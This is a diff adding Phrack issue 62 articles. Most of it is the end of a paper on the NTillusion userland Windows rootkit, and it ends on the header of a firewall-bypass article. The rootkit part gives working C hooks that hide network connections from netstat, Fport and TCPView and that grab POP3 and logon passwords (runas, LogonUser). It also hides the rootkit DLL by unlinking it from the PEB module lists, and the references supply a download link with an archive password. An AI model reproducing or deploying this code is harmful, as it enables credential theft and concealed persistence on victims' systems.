+associates a process identifier with a TCP stream does not exist yet, so 
+information provided by the API doesn't include this reference. 
+
+-------[ 4.4.1.1. Hooking GetTcpTable
+The TCP statistics may officially be obtained by a call to GetTcpTable, 
+which retrieves the TCP connection table (MIB_TCPTABLE).
+
+DWORD GetTcpTable(
+  PMIB_TCPTABLE pTcpTable,
+  PDWORD pdwSize,
+  BOOL border
+);
+
+The functions takes three parameters. The last one, border, decides 
+whether the connection table should be sorted. Then, PdwSize specifies the 
+size of the buffer pointer by the pTcpTable parameter on input. On output, 
+if the buffer is not large enough to hold the returned connection table, 
+the function sets this parameter equal to the required buffer size. 
+Finally, pTcpTable points to a buffer that receives the TCP connection 
+table as a MIB_TCPTABLE structure. A sample retrieving the TCP connection 
+table is available online. [GETTCP]
+
+The MIB_TCPTABLE structure contains a table of TCP connections.
+typedef struct _MIB_TCPTABLE { 
+  DWORD dwNumEntries; 
+  MIB_TCPROW table[ANY_SIZE];
+} MIB_TCPTABLE,  
+*PMIB_TCPTABLE;
+table is a pointer to a table of TCP connections implemented as an array
+of MIB_TCPROW structures, one for each connection.
+
+A MIB_TCPROW stands as follows:
+typedef struct _MIB_TCPROW { 
+  DWORD dwState; 
+  DWORD dwLocalAddr; 
+  DWORD dwLocalPort; 
+  DWORD dwRemoteAddr; 
+  DWORD dwRemotePort;
+} MIB_TCPROW,  
+*PMIB_TCPROW;
+
+While the dwState describes the state of a given connection, dwLocalAddr, 
+dwLocalPort, dwRemoteAddr, dwRemotePort inform about the source and
+destination of the connection. We're interested in dwLocalPort and
+dwRemotePort to determine if the port belongs to the secret range (between
+RTK_PORT_HIDE_MIN and RTK_PORT_HIDE_MAX) and therefore must be hidden.
+To hide a row in TCP table if needed, the MyGetTcpTable function shifts
+the whole array, thus overwriting the unwanted memory zone.
+
+----------------------   EXAMPLE 8   -----------------------------
+/* MyGetTcpTable replacement for GetTcpTable.
+  (error checks stripped)
+*/
+DWORD WINAPI MyGetTcpTable(PMIB_TCPTABLE_ pTcpTable, PDWORD pdwSize, BOOL 
+bOrder)
+{
+	u_long LocalPort=0;   /* remote port on local machine endianness*/
+	u_long RemotePort=0;  /* local port on local machine endianness */
+	DWORD dwRetVal=0, numRows=0; /* counters */
+	int i,j;
+
+	/*Call original function, if no error, strip unwanted MIB_TCPROWs*/
+	dwRetVal = (*fGetTcpTable)(pTcpTable, pdwSize, bOrder);
+	if(dwRetVal == NO_ERROR) 
+	{
+		/* for each row, test if it must be stripped */
+		for (i=0; i<(int)pTcpTable->dwNumEntries; i++) 
+		{
+			LocalPort	= (u_short) fhtons((u_short)
+			   (pTcpTable)->table[i].dwLocalPort);
+
+			RemotePort	= (u_short) fhtons((u_short)
+			   (pTcpTable)->table[i].dwRemotePort);
+	
+			/* If row must be filtered */
+			if( IsHidden(LocalPort, RemotePort) )
+			{
+				/* Shift whole array */
+				for(j=i; j<((int)pTcpTable->dwNumEntries - 1);j++)
+					memcpy( &(pTcpTable->table[i]),
+					 	  &(pTcpTable->table[i+1]),
+					 	  sizeof(MIB_TCPROW_));
+
+				/* Erase last row */
+				memset( &(pTcpTable->table[j]), 
+				          0x00, sizeof(MIB_TCPROW_));
+
+				/* Reduce array size */				
+				(*pdwSize)-= sizeof(MIB_TCPROW_);
+				(pTcpTable->dwNumEntries)--;
+			}	  
+		}
+	}
+
+	return dwRetVal;
+}
+---------------------- END EXAMPLE 8 -----------------------------
+
+Calling GetTcpTable is not the only way to get network statistics under 
+windows 2000. Some programs, such as fport even provide the correspondence
+stream/pid and therefore deal directly with the TCP driver through the 
+DeviceIoControl function. Hijacking this API is not a good idea as I 
+explained before. In consequence, the approach I adopted is to target 
+specific functions used by widespread security tools rather than hooking a 
+level lower by replacing DeviceIoControl.
+
+-------[ 4.4.1.2. Defeating netstat
+In this version of windows, fport isn't the only one that deals directly 
+with the TCP/UDP driver. This is also the case of netstat. To defeat these 
+programs, we just have to replace functions that are involved in network 
+statistic processing from DeviceIoControl call to screen output.
+
+With netstat, the idea is to hook the CharToOemBuffA API that is used to 
+perform characters set translations for each line before it is written to 
+console output.
+
+BOOL CharToOemBuff(       
+    LPCTSTR lpszSrc, /* Pointer to the null-terminated string to 
+			 translate. */
+    LPSTR lpszDst,   /* Pointer to the buffer for the translated 
+			 string.   */
+    DWORD cchDstLength /* Specifies the number of TCHARs to translate */
+);
+
+If the rootkit notices itself being translating a string containing a 
+hidden port, it just calls the function with a blank buffer, so the 
+translation will result in a blank buffer, and output won't show anything.
+
+----------------------   EXAMPLE 9   -----------------------------
+/* MyCharToOemBuffA : replace the function used by nestat to convert  
+strings to a different charset before it sends it to output, so we can get 
+rid of some awkward lines...  :)
+*/
+BOOL WINAPI MyCharToOemBuff(LPCTSTR lpszSrc, LPSTR lpszDst, 
+DWORD cchDstLength)
+{
+	/* If the line contains our port range, we simply get rid of 
+	it. */
+	if(strstr(lpszSrc,(char*)RTK_PORT_HIDE_STR)!=NULL)
+	{
+		/* We call the function, providing a blank string */
+		return (*fCharToOemBuffA)("", lpszDst, cchDstLength); 
+	}
+	return (*fCharToOemBuffA)(lpszSrc, lpszDst, cchDstLength);
+}
+---------------------- END EXAMPLE 9 -----------------------------
+
+As netstat calls the function for each line it writes, there is not 
+problem in avoiding whole ones.
+
+-------[ 4.4.1.2. Defeating Fport
+However, this is not the case of Fport, which processes output character 
+by character. I chose to hook the WriteFile API, and set up a buffer 
+mechanism so output is done line by line, and hiding therefore simpler.
+
+----------------------   EXAMPLE 10  -----------------------------
+/* Convert FPORT.exe's output mode from char by char to line by line to 
+allow hiding of lines containing ports to hide 
+*/
+BOOL WINAPI MyWriteFile(
+  HANDLE hFile,                    /* handle to file to write to */
+  LPCVOID lpBuffer,                /* pointer to data to write to file */
+  DWORD nNumberOfBytesToWrite,     /* number of bytes to write */
+  LPDWORD lpNumberOfBytesWritten,  /* pointer to number of bytes written*/
+  LPOVERLAPPED lpOverlapped        /* pointer to structure for overlapped 
+) 						              I/O*/
+{
+	BOOL bret=TRUE;			/* Return value */
+	char* chr = (char*)lpBuffer;
+	static DWORD total_len=0;		/* static length counter */
+	static char PreviousChars[2048*10];	/* static characters' buffer 
+   (bof?) */
+
+	/* Add the new character */
+	PreviousChars[total_len++] = chr[0];
+	/* Check for line termination */
+	if(chr[0] == '\r') 
+	{
+
+		PreviousChars[total_len] = '\n';
+		PreviousChars[++total_len] = '\0';
+
+		/* show this line only if it contains no hidden port / process 
+		   prefix */
+		if(strstr((char*)PreviousChars,(char*)RTK_PORT_HIDE_STR)==NULL
+			&& strstr((char*)PreviousChars,(char*)RTK_PROCESS_CHAR)==NULL)   
+		{
+			
+			/* Valid line, so process output */
+ 			bret = fWriteFile(hFile, (void*)PreviousChars, 
+ 			    strlen((char*)PreviousChars), 
+ 			    lpNumberOfBytesWritten, 
+ 			    lpOverlapped);
+		}		
+		
+		/* Clear settings */
+		memset(PreviousChars, 0, 2048);
+		total_len= 0;
+	}
+
+	/* fakes the var, so fport can't see output wasn't done */
+	(*lpNumberOfBytesWritten) = nNumberOfBytesToWrite; 
+
+	return bret;
+}
+---------------------- END EXAMPLE 10 -----------------------------
+
+-------[ 4.4.2. The case of windows XP
+Under windows XP programs have not to deal with hell by interacting 
+directly the TCP/UDP driver as the windows API provides sufficient 
+statistics. Thus, the most widespread network tools (netstat, Fport, 
+Tcpview) rely whether on AllocateAndGetTcpExTableFromStack (XP only) or on 
+the classic GetTcpTable depending on the needs. So, to cover the problem 
+under windows XP, the rootkit has just to replace the AllocateAndGetTcpEx
+TableFromStack API. Searching the msdn about this functions is useless. 
+This is an undocumented function. However it exists some useful samples on 
+the web such as [NETSTATP] provided by SysInternals that are quite 
+explicit. The AllocateAndGetTcpExTableFromStack function takes the 
+following parameters.
+
+DWORD AllocateAndGetTcpExTableFromStack( 
+  PMIB_TCPEXTABLE *pTcpTable,	/* buffer for the connection table */
+  BOOL bOrder,				/* sort the table? */
+  HANDLE heap,				/* handle to process heap obtained by 
+   calling GetProcessHeap() */
+  DWORD zero,				/* undocumented */
+  DWORD flags				/* undocumented */
+)
+
+The first parameter is the one interesting. It points to a MIB_TCPEXTABLE 
+structure, that stands for PMIB_TCPTABLE extended, looking as follows.
+
+/* Undocumented extended information structures available 
+   only on XP and higher */
+typedef struct {
+  DWORD   dwState;        /* state of the connection */
+  DWORD   dwLocalAddr;    /* address on local computer */
+  DWORD   dwLocalPort;    /* port number on local computer */
+  DWORD   dwRemoteAddr;   /* address on remote computer */
+  DWORD   dwRemotePort;   /* port number on remote computer */
+  DWORD   dwProcessId;	  /* process identifier */
+} MIB_TCPEXROW, *PMIB_TCPEXROW;
+
+typedef struct {
+	DWORD			dwNumEntries;
+	MIB_TCPEXROW	table[];
+} MIB_TCPEXTABLE, *PMIB_TCPEXTABLE;
+
+This is the same as the structures employed to work with GetTcpTable, so 
+the replacement function's job will be somewhat identical.
+
+----------------------   EXAMPLE 11  -----------------------------
+/*
+AllocateAndGetTcpExTableFromStack replacement. (error checks 
+stripped)
+*/
+DWORD WINAPI MyAllocateAndGetTcpExTableFromStack( 
+  PMIB_TCPEXTABLEE *pTcpTable,
+  BOOL bOrder,
+  HANDLE heap,
+  DWORD zero,
+  DWORD flags
+)
+{
+/* error handler, TcpTable walk index, TcpTable sort index */
+DWORD err=0, i=0, j=0; 
+	char psname[512];	 			/* process name */
+	u_long LocalPort=0, RemotePort=0;	/* local & remote port */
+
+	
+	/* Call genuine function ... */
+	err = fAllocateAndGetTcpExTableFromStack( pTcpTable, bOrder, heap, 
+	zero,flags );
+
+	/* Exit immediately on error */
+	if(err)
+		return err;	
+
+	/* ... and start to filter unwanted rows. This will hide all 
+	opened/listening/connected/closed/... sockets that belong to 
+	secret range or reside in a secret process
+	*/
+	/* for each process... */
+	for(i = 0; i < ((*pTcpTable)->dwNumEntries); j=i) 
+	{
+		/* Get process name to filter secret processes' sockets */
+		GetProcessNamebyPid((*pTcpTable)->table[i].dwProcessId, 
+		(char*)psname);
+		/* convert from host to TCP/IP network byte order 
+        (which is big-endian)*/
+		LocalPort	= (u_short) fhtons((u_short)
+		(*pTcpTable)->table[i].dwLocalPort);
+		RemotePort	= (u_short) fhtons((u_short)
+		(*pTcpTable)->table[i].dwRemotePort);
+
+		/* Decide whether to hide row or not */
+		if(  !_strnicmp((char*)psname, RTK_FILE_CHAR, 
+		     strlen(RTK_FILE_CHAR)) 
+		     ||  IsHidden(LocalPort, RemotePort) )
+		{
+			/* Shift whole array*/
+			for(j=i; j<((*pTcpTable)->dwNumEntries); j++)
+				memcpy( (&((*pTcpTable)->table[j])), 
+				      (&((*pTcpTable)->table[j+1])),
+			           sizeof(MIB_TCPEXROWEx));
+
+			/* clear last row */
+			memset( (&((*pTcpTable)->table[((
+			        (*pTcpTable)->dwNumEntries)-1)])), 
+			         0, sizeof(MIB_TCPEXROWEx));
+			
+			/* decrease row number */
+			((*pTcpTable)->dwNumEntries)-=1;
+			
+
+			/* do the job again for the current row, that may also 
+			   contain a hidden process */
+			continue;
+		}
+
+	 	/* this row was ok, jump to the next */
+		i++;
+	}
+  return err;
+}
+---------------------- END EXAMPLE 11 -----------------------------
+
+These replacement functions reside in kNTINetHide.c.
+
+
+-------[ 4.5. Global TCP backdoor / password grabber
+As the rootkit is injected in almost every user process, there's a 
+possibility to set up a global TCP backdoor by hijacking recv and WSARecv, 
+allowing transforming any application (including a web server), into an 
+opportune backdoor.  This is complicated enough to be a whole project in 
+itself so I focused on a password grabber virtually able to hijack 
+passwords sent by any mail client [kSENTINEL]. Currently, it targets at 
+Outlook and Netscape mail client but may easily be extended to other 
+applications by playing with the #defines. It dynamically hijacks the TCP 
+stream when the mail client deals with remote server. Therefore, it allows 
+to grab USER and PASS commands to be used for later privileges escalation.
+
+----------------------   EXAMPLE 12   -----------------------------
+/* POP3 Password grabber. Replaces the send() socket function.
+*/
+int WINAPI MySend(SOCKET s, const char FAR * buf, int len, int flags)
+{
+	int retval=0;		/* Return value */
+	char* packet;		/* Temporary buffer */
+	
+	if(!fSend)		/* no one lives for ever (error check) */
+		return 0;
+	
+	/* Call original function */
+	retval = fSend(s, buf, len, flags);
+
+	/* packet is a temp buffer used to deal with the buf parameter 
+	   that may be in a different memory segment, so we use the 
+	   following memcpy trick.
+	*/
+	packet = (char*) malloc((len+1) * sizeof(char));
+	memcpy(packet, buf, len);
+	
+	/* Check if memory is readable */
+	if(!IsBadStringPtr(packet, len))	
+	{
+		/* Filter interesting packets (POP3 protocol) */
+		if(strstr(packet, "USER") || strstr(packet, "PASS"))
+		{
+			/* Interesting packet found! */
+
+			/* Write a string to logfile (%user 
+			profile%\NTILLUSION_PASSLOG_FILE) */
+
+			Output2LogFile("'%s'\n", packet);
+		}
+	}
+
+	
+	 free(packet);
+ 
+     return retval;
+}
+---------------------- END EXAMPLE 12 -----------------------------
+
+FTP logins and passwords may also be grabbed by adding the proper 
+expression in the filter condition.
+
+
+-------[ 4.6. Privilege escalation
+Catching POP3 and FTP passwords may allow spreading on the local machine 
+since users often use the same password on different accounts. Anyway when 
+grabbing a password used to login as another user on the machine, there's 
+no doubt that the password will be efficient. Indeed, the rootkit logs 
+attempts to impersonate another user from the desktop. This is the case 
+when the user employs the runas command or selects "the run as user" menu 
+by right clicking on an executable. The API involved in these situations 
+are redirected so any successful login is carefully saved on hard disk for 
+further use. 
+This is achieved through the replacement of LogonUserA and CreateProcess
+WithLogonW.
+
+The runas tool present on windows 2000/XP relies on CreateProcessWith
+LogonW. Its replacement follows.
+
+----------------------   EXAMPLE 13   -----------------------------
+/* MyCreateProcessWithLogonW : collects logins/passwords employed to 
+create a process as a user. This Catches runas passwords. (runas 
+/noprofile /user:MyBox\User cmd)
+*/
+BOOL WINAPI MyCreateProcessWithLogonW(
+LPCWSTR lpUsername,		/* user name for log in request */
+LPCWSTR lpDomain,			/* domain name for log in request */
+LPCWSTR lpPassword,		/* password for log in request */
+DWORD dwLogonFlags,		/* logon options*/
+LPCWSTR lpApplicationName,	/* application name... */
+LPWSTR lpCommandLine,		/* command line */
+DWORD dwCreationFlags,		/* refer to CreateProcess*/
+LPVOID lpEnvironment,		/* environment vars*/
+LPCWSTR lpCurrentDirectory,	/* base directory */
+LPSTARTUPINFOW lpStartupInfo,	/* startup and process infor, see 
+CreateProcess */
+LPPROCESS_INFORMATION lpProcessInfo)
+{
+	BOOL bret=false;	/* Return value */
+	char line[1024];	/* Buffer used to set up log lines */
+
+	/* 1st of all, log on the user */
+	bret = fCreateProcessWithLogonW(lpUsername,lpDomain,lpPassword,
+    dwLogonFlags,lpApplicationName,lpCommandLine,
+	dwCreationFlags,lpEnvironment,lpCurrentDirectory,
+	lpStartupInfo,lpProcessInfo);
+	
+	/* Inject the created process if its name doesn't begin by 
+   RTK_FILE_CHAR (protected process) */
+	/* Stripped [...] */
+
+	/* Log the information for further use */
+	memset(line, 0, 1024);
+	if(bret)
+	{
+		sprintf(line, "Domain '%S' - Login '%S' - Password '%S'  
+        LOGON SUCCESS", lpDomain, lpUsername, lpPassword);
+	}	
+	else
+	{
+		sprintf(line, "Domain '%S' - Login '%S' - Password '%S'  
+		LOGON FAILED", lpDomain, lpUsername, lpPassword);
+	}
+
+	/* Log the line */
+	Output2LogFile((char*)line);
+
+  return bret;
+}
+---------------------- END EXAMPLE 13 -----------------------------
+
+Under windows XP, explorer.exe offers a GUI to perform logon operations 
+from the desktop. This relies on LogonUser that may be replaced as below. 
+We're interested only in lpszUsername, lpszDomain and lpszPassword.
+
+----------------------   EXAMPLE 14   -----------------------------
+/* MyLogonUser : collects logins/passwords employed to log on from the 
+local station */
+BOOL WINAPI MyLogonUser(LPTSTR lpszUsername, LPTSTR lpszDomain, LPTSTR 
+lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken)
+{
+	char buf[1024];	/* Buffer used to set up log lines */
+	
+	/* Set up buffer */
+	memset(buf, 0, 1024);
+	sprintf(buf, "Login '%s' / passwd '%s' / domain '%'\n", 
+	lpszUsername, 
+	lpszPassword,
+	lpszDomain);
+	/* Log to disk */
+	Output2LogFile((char*)buf);
+
+	/* Perform LogonUser call */
+	return fLogonUser(lpszUsername, lpszDomain, lpszPassword, 
+	dwLogonType, dwLogonProvider, phToken);
+}
+---------------------- END EXAMPLE 14 -----------------------------
+
+The grabbed data are sent to a log file at user profile's root and may be 
+encrypted using a simple 1 byte XOR key.
+
+
+-------[ 4.7. Module stealth
+As soon as it is loaded into a process, the rootkit hides its DLL. 
+Therefore, if the system does not hook LdrLoadDll or its equivalent at 
+kernel level, it appears that the rookit was never injected into 
+processes. The technique used below is very efficient against all programs 
+that rely on the windows API for enumerating modules. Due to the fact that 
+EnumProcessModules/Module32First/Module32Next/... depend on NtQuerySystem
+Information, and because this technique foils the manner this API 
+retrieves information, there's no way to be detected by this intermediary. 
+This defeats programs enumerating processes' modules such as ListDlls, 
+ProcessExplorer (See [LISTDLLS] and [PROCEXP]), and VICE rootkit detector. 
+[VICE]
+
+The deception is possible in ring 3 since the kernel maintains a list of 
+each loaded DLL for a given process inside its memory space, in userland. 
+Therefore a process may affect himself and overwrite parts of its memory 
+in order to hide one of its module. These data structures are of course 
+undocumented but can be recovered by using the Process Environment Block 
+(PEB), located at FS:0x30 inside each process. The function below returns 
+the address of the PEB for the current process.
+
+----------------------   EXAMPLE 15   -----------------------------
+DWORD GetPEB()
+{
+	DWORD* dwPebBase = NULL;
+	/* Return PEB address for current process
+	   address is located at FS:0x30 */
+		__asm 
+		{
+			push eax
+			mov eax, FS:[0x30]
+			mov [dwPebBase], eax
+			pop eax
+		}
+	return (DWORD)dwPebBase;
+}
+---------------------- END EXAMPLE 15 -----------------------------
+
+The role of the PEB is to gather frequently accessed information for a 
+process as follows. At address FS:0x30 (or 0x7FFDF000) stands the 
+following members of the [PEB].
+
+/* located at 0x7FFDF000 */
+typedef struct _PEB 
+{
+  BOOLEAN                 InheritedAddressSpace;
+  BOOLEAN                 ReadImageFileExecOptions;
+  BOOLEAN                 BeingDebugged;
+  BOOLEAN                 Spare;
+  HANDLE                  Mutant;
+  PVOID                   ImageBaseAddress;
+  PPEB_LDR_DATA           LoaderData;
+  PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
+  [...]
+  ULONG                   SessionId;
+} PEB, *PPEB;
+
+The interesting member in our case is PPEB_LDR_DATA LoaderData that 
+contains information filled by the loader at startup, and then when 
+happens a DLL load/unload.
+ 
+typedef struct _PEB_LDR_DATA 
+{
+  ULONG                   Length;
+  BOOLEAN                 Initialized;
+  PVOID                   SsHandle;
+  LIST_ENTRY              InLoadOrderModuleList;
+  LIST_ENTRY              InMemoryOrderModuleList;
+  LIST_ENTRY              InInitializationOrderModuleList;
+} PEB_LDR_DATA, *PPEB_LDR_DATA;
+
+The PEB_LDR_DATA structure contains three LIST_ENTRY that are part of doubly 
+linked lists gathering information on loaded DLL in the current process.
+InLoadOrderModuleList sorts modules in load order, InMemoryOrderModuleList 
+in memory order, and InInitializationOrderModuleList keeps track of their 
+load order since process start.
+
+These doubly linked list contains pointers to LDR_MODULE inside the parent 
+structure for next and previous module.
+
+typedef struct _LDR_MODULE {
+
+  LIST_ENTRY              InLoadOrderModuleList;
+  LIST_ENTRY              InMemoryOrderModuleList;
+  LIST_ENTRY              InInitializationOrderModuleList;
+  PVOID                   BaseAddress;
+  PVOID                   EntryPoint;
+  ULONG                   SizeOfImage;
+  UNICODE_STRING          FullDllName;
+  UNICODE_STRING          BaseDllName;
+  ULONG                   Flags;
+  SHORT                   LoadCount;
+  SHORT                   TlsIndex;
+  LIST_ENTRY              HashTableEntry;
+  ULONG                   TimeDateStamp;
+
+} LDR_MODULE, *PLDR_MODULE;
+
+In fact, this is not exactly true since LIST_ENTRY have a special 
+behavior. Indeed, the base address of the surrounding object is computed 
+by subtracting the offset of the LIST_ENTRY member from it's address 
+(&LIST_ENTRY), because LIST_ENTRY Flink and Blink members always point to 
+the another LIST_ENTRY inside the list, not to the owner of the list node. 
+This makes it possible to interlink objects in multiple lists without any 
+interference as explains Sven B. Schreiber in Undocumented Windows 2000 
+Secrets. To access InLoadOrderModuleList elements, we don't have to bother 
+about offsets since it is the first element of the LDR_MODULE structure so 
+it just needs to be casted to get a LDR_MODULE from a LIST_ENTRY. In the 
+case of InMemoryOrderModuleList we'll have to subtract sizeof(LIST_ENTRY). 
+Similarly, to access the LDR_MODULE from InInitializationOrderModuleList 
+we just subtract 2*sizeof(LIST_ENTRY).
+The following sample demonstrates how to walk one of these lists and throw 
+a module away according to its name (szDllToStrip).
+
+----------------------   EXAMPLE 16   -----------------------------
+/*  Walks one of the three modules double linked lists referenced by the 
+PEB  (error check stripped)
+ModuleListType is an internal flag to determine on which list to operate :
+LOAD_ORDER_TYPE <---> InLoadOrderModuleList
+MEM_ORDER_TYPE  <---> InMemoryOrderModuleList
+INIT_ORDER_TYPE <---> InInitializationOrderModuleList
+*/
+int WalkModuleList(char ModuleListType, char *szDllToStrip)
+{
+	int i;	/* internal counter */
+	DWORD PebBaseAddr, dwOffset=0;
+	
+	/* Module list head and iterating pointer */
+	PLIST_ENTRY pUserModuleListHead, pUserModuleListPtr;
+	
+	/* PEB->PEB_LDR_DATA*/
+	PPEB_LDR_DATA pLdrData;
+	/* Module(s) name in UNICODE/AINSI*/
+	PUNICODE_STRING pImageName;
+	char szImageName[BUFMAXLEN];
+	
+	/* First, get Process Environment Block */	
+	PebBaseAddr = GetPEB(0);
+
+	/* Compute PEB->PEB_LDR_DATA */
+	pLdrData=(PPEB_LDR_DATA)(DWORD *)(*(DWORD *)(PebBaseAddr + 
+						PEB_LDR_DATA_OFFSET)); 
+
+	/* Init linked list head and offset in LDR_MODULE  structure */
+	if(ModuleListType == LOAD_ORDER_TYPE)
+	{
+		/* InLoadOrderModuleList */
+		pUserModuleListHead = pUserModuleListPtr = 
+		(PLIST_ENTRY)(&(pLdrData->ModuleListLoadOrder));
+		dwOffset = 0x0;
+	} else if(ModuleListType == MEM_ORDER_TYPE)
+	{
+		/* InMemoryOrderModuleList */
+		pUserModuleListHead = pUserModuleListPtr = 
+		(PLIST_ENTRY)(&(pLdrData->ModuleListMemoryOrder));
+		dwOffset = 0x08;
+	} else if(ModuleListType == INIT_ORDER_TYPE)
+	{
+		/* InInitializationOrderModuleList */
+		pUserModuleListHead = pUserModuleListPtr = 
+		(PLIST_ENTRY)(&(pLdrData->ModuleListInitOrder));
+		dwOffset = 0x10;
+	}
+
+	/* Now walk the selected list */	
+	do
+	{
+		/* Jump to next LDR_MODULE structure */
+		pUserModuleListPtr = pUserModuleListPtr->Flink;
+		pImageName = (PUNICODE_STRING)( 
+			     ((DWORD)(pUserModuleListPtr)) +
+			     (LDR_DATA_PATHFILENAME_OFFSET-dwOffset));
+
+        	/* Decode unicode string to lower case on the fly */
+		for(i=0; i < (pImageName->Length)/2 && i<BUFMAXLEN;i++) 
+                  szImageName[i] = LOWCASE(*( (pImageName->Buffer)+(i) ));
+		/* Null terminated string */
+		szImageName[i] = '\0';
+
+		/* Check if it's target DLL */
+		if( strstr((char*)szImageName, szDllToStrip) != 0 )
+		{
+			/* Hide this dll : throw this module away (out of 
+			   the double linked list)
+        		(pUserModuleListPtr->Blink)->Flink = 
+				(pUserModuleListPtr->Flink);
+           		(pUserModuleListPtr->Flink)->Blink = 
+				(pUserModuleListPtr->Blink);
+			/* Here we may also overwrite memory to prevent 
+			   recovering (paranoid only ;p) */
+		}
+	}	while(pUserModuleListPtr->Flink != pUserModuleListHead); 
+
+	return FUNC_SUCCESS;
+}
+---------------------- END EXAMPLE 16 -----------------------------
+
+To process the three linked lists, the rootkit calls the HideDll function 
+below.
+----------------------   EXAMPLE 17   -----------------------------
+int HideDll(char *szDllName)
+{
+	return (	WalkModuleList(LOAD_ORDER_TYPE, szDllName)
+			&&	WalkModuleList(MEM_ORDER_TYPE, szDllName)
+			&&	WalkModuleList(INIT_ORDER_TYPE, szDllName)	);
+}
+---------------------- END EXAMPLE 17 -----------------------------
+
+I never saw this method employed to hide a module but instead to recover 
+the base address of a DLL in elaborated shellcodes [PEBSHLCDE].
+To end with this technique, I'll say that it is from far efficient against 
+ring 3 programs but becomes a little bit ineffective against a personal 
+firewall acting at kernel level, such as Sygate Personal Firewall. This 
+one cannot be defeated using the presented method and analysis of its 
+source code shows as it sets hooks in the kernel syscall table, thereby 
+being informed as soon as a DLL is loaded into any process and subsequent 
+hiding is useless. In a word, personal firewalls are the worst enemies of 
+userland rootkits.
+
+-------[ 5. Ending
+-------[ 5.1. Conclusion
+The mechanisms presented in this paper are the result of long research and
+experimentations. It shows up that ring 3 rootkit are an effective threat
+for nowadays computer systems but may be defeated by a clever analysis of
+the weakpoints they target. So this type of rootkit isn't perfect as data
+may still be detected, even though they're from far more difficult to
+notice. Keep in mind that the most important thing is not to cause
+suspicion, and therefore not be detected. In a word, ring 3 rootkits are
+perfect meantime to get administrative privilege on the local machine and
+install a most adapted ring 0 rootkit that will be more suitable to reach
+the maximum stealth.
+
+
+-------[ 5.2. Greets
+"If I have seen further it is by standing on the shoulders of giants." 
+This quotation from Isaac Newton (1676) perfectly describes the ways 
+things work. Therefore, my thanks first go to all authors that make the 
+internet a place of free information and exchanges. Without them you would 
+probably not be reading these lines. This is especially true for Ivo 
+Ivanov - thanks to you I discovered the world of API hooking -, Crazylord
+who provided me precious information to set up my first device driver,
+Holy_Father and Eclips for considering some questions about userland
+take over. Added to that, I'd like to thank my friends and revisers that
+helped me set up a more accessible paper. I hope this goal is achieved.
+Finally, I salute my friends and teammates; you know who you are. 
+Special thanks to my buddy and personal unix consultant Artyc.
+
+That's all folks!
+
+"I tried so hard, and gone so far. But in the end, it doesnt even
+matter..."
+
+
+Kdm 
+Kodmaker@syshell.org
+http://www.syshell.org/
+
+
+
+-------[ 6. References
+- [1]
+http://www.syshell.org/?r=../phrack62/NTILLUSION_fullpack.txt
+- [NTillusion rootkit]
+http://www.syshell.org/?r=../phrack62/NTIllusion.rar
+Login/Pass	:	phrackreaders/ph4e#ho5
+Rar password	: 	0wnd4wurld
+- [HIDINGEN]
+http://rootkit.host.sk/knowhow/hidingen.txt
+- [HOOKS] A HowTo for setting system wide hooks
+http://www.codeguru.com/Cpp/W-P/system/misc/article.php/c5685/ 
+- [MSDN_HOOKS]
+http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/WinUI/
+WindowsUserInterface/Windowing/Hooks.asp
+- [3WAYS] Three ways to inject your code into another process 
+http://www.codeguru.com/Cpp/W-P/system/processesmodules/article.php/c5767/
+- [LSD] Win32 assembly components 
+http://www.lsd-pl.net/documents/winasm-1.0.1.pdf 
+- [THCONTEXT] GetThreadContext remote code triggering proof of concept 
+http://www.syshell.org/?r=Rootkit/Code_Injection/GetSetThreadContex/kCtxIn
+ject/
+- [REMOTETH] 
+http://win32.mvps.org/processes/remthread.html
+- [PE]
+http://www.syshell.org/?r=Rootkit/PE/Doc/MattPietrek
+- [IVANOV]
+http://www.codeguru.com/Cpp/W-P/system/misc/article.php/c5667/
+- [UNLEASHED]
+http://www.codeproject.com/system/api_monitoring_unleashed.asp
+- [DETOURS] Detours win32 functions interception
+http://research.microsoft.com/sn/detours/
+[HKDEF_RTK] Hacker Defender rootkit
+http://rootkit.host.sk/
+- [HKDEF] Hacker Defender (Holy_Father 2002)
+http://rootkit.host.sk/knowhow/hookingen.txt
+- [ZOMBIE2] Entry point rewriting
+http://www.syshell.org/?r=Rootkit/Api_Hijack/Code/EntryPointRewritting/
+- [EXPLORIAT]
+http://www.syshell.org/?r=Rootkit/Snippets/ExplorerIAT2k.log
+- [MSDN] Microsoft Developers Network 
+http://msdn.microsoft.com/library/
+- [NtQuerySystemInformation]
+http://msdn.microsoft.com/library/default.asp?url=/library/en-
+us/sysinfo/base/ntquerysysteminformation.asp
+- [GETTCP] GetTcpTable
+http://msdn.microsoft.com/library/default.asp?url=/library/en-
+us/iphlp/iphlp/gettcptable.asp
+- [NETSTATP] Netstat like
+http://www.sysinternals.com/files/netstatp.zip
+- [kSENTINEL] POP3 passwords grabber
+http://www.syshell.org/?r=Rootkit/Releases/POP3_Stealer/kSentinel/kSentine
+l.c
+- [FPORT] Network Tool
+http://foundstone.com/resources/freetools/fport.zip
+- [TCPVIEW] Network Tool
+http://www.sysinternals.com/ntw2k/source/tcpview.shtml
+- [LISTDLLS] DLL listing tool
+http://www.sysinternals.com/ntw2k/freeware/listdlls.shtml
+- [PROCEXP] Process Explorer
+http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
+- [VICE] Catch hookers!
+http://www.rootkit.com
+- [PEB]
+http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%2
+0Objects/Process/PEB.html
+- [PEBSHLCDE]
+http://madchat.org/coding/w32nt.rev/RW32GS.txt
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/13.txt b/phrack62/13.txt
new file mode 100644
index 0000000..94ea0e5
--- /dev/null
+++ b/phrack62/13.txt
@@ -0,0 +1,2152 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x0d of 0x10
+
+|=--=[  Using Process Infection to Bypass Windows Software Firewalls ]=--=|
+|=-----------------------------------------------------------------------=|
+|=---------------------------=[ rattle ]=--------------------------------=|
+
+
+-[0x00] :: Table Of Contents ---------------------------------------------
+
+  [0x01] introduction
+  [0x02] how software firewalls work
+  [0x03] process Infection without external .dll
+  [0x04] problems of implementation
+  [0x05] how to implement it
+  [0x06] limits of this implementation
+  [0x07] workaround: another infection method
+  [0x08] conclusion
+  [0x09] last words
+
+  [0x0A] references
+
+  [0x0B] injector source code
+  [0x0C] Tiny bypass source code
+  [0x0D] binaries (base64)
+
+
+
+-[0x01] :: introduction --------------------------------------------------
